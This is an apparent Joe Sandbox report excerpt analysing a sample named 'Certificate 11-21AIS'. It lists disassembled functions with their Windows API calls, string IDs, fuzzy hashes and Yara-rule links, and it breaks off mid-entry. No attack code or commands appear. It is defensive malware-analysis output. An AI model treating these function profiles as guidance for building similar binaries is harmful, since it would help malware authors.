                                                                              • Opcode ID: c13e61ef212c62ddac3700a2d3c3d60621febc6e74a2112ca3a6dc05c2c2b84d
                                                                              • Instruction ID: b7e4cd908bbf72052b127d7377c9d0e085b243b687c16092dc7c9e0a052fac4c
                                                                              • Opcode Fuzzy Hash: c13e61ef212c62ddac3700a2d3c3d60621febc6e74a2112ca3a6dc05c2c2b84d
                                                                              • Instruction Fuzzy Hash: D841C138006144DBDB24AF28D889FB93B66FB06734F554362FD65CA2E6D7308C41DB25
                                                                              Function 0090690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 136442275-0
                                                                              • Opcode ID: aba04a61ffef1eb41e352114bc9e426963f28c6a620751aeab15ec96bd07ca8b
                                                                              • Instruction ID: 3bd48416794fae5c45ebe454cd2f5baa3b15ef21b4d57515d0fd559213a8646e
                                                                              • Opcode Fuzzy Hash: aba04a61ffef1eb41e352114bc9e426963f28c6a620751aeab15ec96bd07ca8b
                                                                              • Instruction Fuzzy Hash: D1415B7694511CAECF61EB95CC45DCB73BCFB84300F1045A6BA59E2081EB70ABE88F51
                                                                              Function 0090D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(0095DC00,0095DC00,0095DC00), ref: 0090D7CE
                                                                              • GetDriveTypeW.KERNEL32(?,00973A70,00000061), ref: 0090D898
                                                                              • _wcscpy.LIBCMT ref: 0090D8C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2820617543-1000479233
                                                                              • Opcode ID: bbe8f6ae66fb293af48a332b32bae02f2cca7e7bbc21abc81478bb0ed67caa8c
                                                                              • Instruction ID: 716cbad77246a0b6c1b51a68ba5d5200dedd020935c7d79a4b0ebe3ff83d1c87
                                                                              • Opcode Fuzzy Hash: bbe8f6ae66fb293af48a332b32bae02f2cca7e7bbc21abc81478bb0ed67caa8c
                                                                              • Instruction Fuzzy Hash: E9518035115300AFC714EF58C892A6EB7A5FF94314F10C92EF9AA972E2EB31DD05CA42
                                                                              Function 008C936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 008C93AB
                                                                              • __itow.LIBCMT ref: 008C93DF
                                                                                • Part of subcall function 008E1557: _xtow@16.LIBCMT ref: 008E1578
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf_xtow@16
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 1502193981-2263619337
                                                                              • Opcode ID: 2eb4d43d144fce7d435286298336d4390aef2b6d79f1e4bbb3ef460fbd444c7d
                                                                              • Instruction ID: ef9c2dd1dc159d49e8e509acaa8d9f451731c1d49cab05be0461f3fbb95a591f
                                                                              • Opcode Fuzzy Hash: 2eb4d43d144fce7d435286298336d4390aef2b6d79f1e4bbb3ef460fbd444c7d
                                                                              • Instruction Fuzzy Hash: 2F41B472504204ABDB24DB78D946FAAB7F8FB45304F2044AEE18AD7282EA31E941DF51
                                                                              Function 0092A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0092A259
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0092A260
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0092A273
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0092A27B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0092A286
                                                                              • DeleteDC.GDI32(00000000), ref: 0092A28F
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0092A299
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0092A2AD
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0092A2B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: 31839f96aa4b4e1b0a36614256406b482c37c63a5183c37daf26b243c955b764
                                                                              • Instruction ID: 149dd96e86cdc167b4ada6894dfc8284e9311a6b7191d3628b7b4d791bd965da
                                                                              • Opcode Fuzzy Hash: 31839f96aa4b4e1b0a36614256406b482c37c63a5183c37daf26b243c955b764
                                                                              • Instruction Fuzzy Hash: 60318E36115124EBDF119FA4EC49FEA3B6DFF0E360F110214FA29A61A0C735D811EBA5
                                                                              Function 00906F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2620052-3771769585
                                                                              • Opcode ID: b95a9bb31606bb2b12f95b75217f8a464ac95382c6a2740c49deeb47f672ee47
                                                                              • Instruction ID: fbd8732181c27da189bc01c90af9a0168b0750fe4bc7c033ce6eb1388e815d11
                                                                              • Opcode Fuzzy Hash: b95a9bb31606bb2b12f95b75217f8a464ac95382c6a2740c49deeb47f672ee47
                                                                              • Instruction Fuzzy Hash: CE113676A08215AFCB24AB74EC0AEDA77BCEF41720F000165F245E60C1EFB4EAC09B51
                                                                              Function 008E500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008E5047
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • __gmtime64_s.LIBCMT ref: 008E50E0
                                                                              • __gmtime64_s.LIBCMT ref: 008E5116
                                                                              • __gmtime64_s.LIBCMT ref: 008E5133
                                                                              • __allrem.LIBCMT ref: 008E5189
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51A5
                                                                              • __allrem.LIBCMT ref: 008E51BC
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51DA
                                                                              • __allrem.LIBCMT ref: 008E51F1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E520F
                                                                              • __invoke_watson.LIBCMT ref: 008E5280
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction ID: 929be93cc074400216a79a274c6eda0f4636eec65b2b1f0b558b5cbbbe27db5d
                                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction Fuzzy Hash: 5471E871A00F5BABD714AE7ECC41B6AB7A8FF12768F144229FA10D6681E770D9408BD1
                                                                              Function 00904DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00904DF8
                                                                              • GetMenuItemInfoW.USER32(00981708,000000FF,00000000,00000030), ref: 00904E59
                                                                              • SetMenuItemInfoW.USER32(00981708,00000004,00000000,00000030), ref: 00904E8F
                                                                              • Sleep.KERNEL32(000001F4), ref: 00904EA1
                                                                              • GetMenuItemCount.USER32(?), ref: 00904EE5
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00904F01
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00904F2B
                                                                              • GetMenuItemID.USER32(?,?), ref: 00904F70
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00904FB6
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00904FCA
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00904FEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: 0616bd048e4eed00f6f89effbf4e869e3e012f711d9754184ef8b07df8742ae8
                                                                              • Instruction ID: 8bf3bd496085e4f441aca642b78794a4db9ce07e91ea201bf1a91c7a4396a1ae
                                                                              • Opcode Fuzzy Hash: 0616bd048e4eed00f6f89effbf4e869e3e012f711d9754184ef8b07df8742ae8
                                                                              • Instruction Fuzzy Hash: A861AEB5A0424AAFDB20CFA4DC88EAE7BBCFB41304F140459FA41A7291D730AD45DB21
                                                                              Function 00929C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00929C98
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00929C9B
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00929CBF
                                                                              • _memset.LIBCMT ref: 00929CD0
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00929CE2
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00929D5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 204df7aab776d932f9938b79e415a182dc1082b2064b832f53d6152a4d291861
                                                                              • Instruction ID: d8e3f46fed62c9147ed062c4113a32e760d8c07cc8248983bd32b5e6f16b2f77
                                                                              • Opcode Fuzzy Hash: 204df7aab776d932f9938b79e415a182dc1082b2064b832f53d6152a4d291861
                                                                              • Instruction Fuzzy Hash: 8F617A75A00218AFDB10DFA8DC81EEEB7B8EB09704F14415AFA44E7291D774AD42DB50
                                                                              Function 008F94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 008F94FE
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 008F9549
                                                                              • VariantInit.OLEAUT32(?), ref: 008F955B
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 008F957B
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 008F95BE
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 008F95D2
                                                                              • VariantClear.OLEAUT32(?), ref: 008F95E7
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 008F95F4
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008F95FD
                                                                              • VariantClear.OLEAUT32(?), ref: 008F960F
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008F961A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: 1880f7b00a84a80074007608dc4bbbadb525f7de2552093a252c7b2f59236e4d
                                                                              • Instruction ID: 5b6e2c9ec431980406b8ef96a5b882a9a65df5ecb12e539ddce5b288020adb66
                                                                              • Opcode Fuzzy Hash: 1880f7b00a84a80074007608dc4bbbadb525f7de2552093a252c7b2f59236e4d
                                                                              • Instruction Fuzzy Hash: 2B41303991421DAFCB01DFA4D848EEEBB79FF08354F008065E551E7261DB34EA45DBA1
                                                                              Function 0091ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • CoInitialize.OLE32 ref: 0091ADF6
                                                                              • CoUninitialize.OLE32 ref: 0091AE01
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0094D8FC,?), ref: 0091AE61
                                                                              • IIDFromString.OLE32(?,?), ref: 0091AED4
                                                                              • VariantInit.OLEAUT32(?), ref: 0091AF6E
                                                                              • VariantClear.OLEAUT32(?), ref: 0091AFCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: 3aa8f157e1def1fb230c1e2cc58c053cb586bd8371ba5576f3ea238b6f442329
                                                                              • Instruction ID: 3d952e6f95d5462e92f5fed37fa29e26a75f965423ec1820b37ebcf97a51620c
                                                                              • Opcode Fuzzy Hash: 3aa8f157e1def1fb230c1e2cc58c053cb586bd8371ba5576f3ea238b6f442329
                                                                              • Instruction Fuzzy Hash: 77618A71309315AFD710DF64C888FAABBE8AF89714F004809F9859B292C774ED85CB93
                                                                              Function 00918107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00918168
                                                                              • inet_addr.WSOCK32(?,?,?), ref: 009181AD
                                                                              • gethostbyname.WSOCK32(?), ref: 009181B9
                                                                              • IcmpCreateFile.IPHLPAPI ref: 009181C7
                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00918237
                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0091824D
                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009182C2
                                                                              • WSACleanup.WSOCK32 ref: 009182C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                              • String ID: Ping
                                                                              • API String ID: 1028309954-2246546115
                                                                              • Opcode ID: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
                                                                              • Instruction ID: 3bf262df8a78137534397369e877f42d45128ec6ab76e7c950da1fc5cf8b00fd
                                                                              • Opcode Fuzzy Hash: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
                                                                              • Instruction Fuzzy Hash: 90518E35604604AFD721AF64CC45F6BBBE8FF49350F048929FA65DB2A1DB34E841EB42
                                                                              Function 00929E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00929E5B
                                                                              • CreateMenu.USER32 ref: 00929E76
                                                                              • SetMenu.USER32(?,00000000), ref: 00929E85
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00929F12
                                                                              • IsMenu.USER32(?), ref: 00929F28
                                                                              • CreatePopupMenu.USER32 ref: 00929F32
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00929F63
                                                                              • DrawMenuBar.USER32 ref: 00929F71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 176399719-4108050209
                                                                              • Opcode ID: 15643467c8bdd4207dfcc3b045cada15d19ab14c372d5690e85fb895569c33e3
                                                                              • Instruction ID: 1b965e33e37a004f24cf0d414704f6830b0fa82b5c33f4a722ca4dbb9455cb5a
                                                                              • Opcode Fuzzy Hash: 15643467c8bdd4207dfcc3b045cada15d19ab14c372d5690e85fb895569c33e3
                                                                              • Instruction Fuzzy Hash: DC4154B8A11209AFDB10DFA8E944BEABBB9FF49304F144028F945A7364D730AD10DF90
                                                                              Function 0090E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090E396
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0090E40C
                                                                              • GetLastError.KERNEL32 ref: 0090E416
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0090E483
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: bc69f36b6cdd78da7091c96be1c9966f075b0ab5e7bfd9c8a7aa6186973c603c
                                                                              • Instruction ID: 90b8c18ca26dc9f66f273a9a7d138d39b96c7a2e187200aad879849dfb35d52f
                                                                              • Opcode Fuzzy Hash: bc69f36b6cdd78da7091c96be1c9966f075b0ab5e7bfd9c8a7aa6186973c603c
                                                                              • Instruction Fuzzy Hash: B5315E36A002099FDB01EF68C845EBDB7B8FF49704F14C86AE945EB2E1DB749A01D752
                                                                              Function 008FB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008FB98C
                                                                              • GetDlgCtrlID.USER32 ref: 008FB997
                                                                              • GetParent.USER32 ref: 008FB9B3
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008FB9B6
                                                                              • GetDlgCtrlID.USER32(?), ref: 008FB9BF
                                                                              • GetParent.USER32(?), ref: 008FB9DB
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008FB9DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
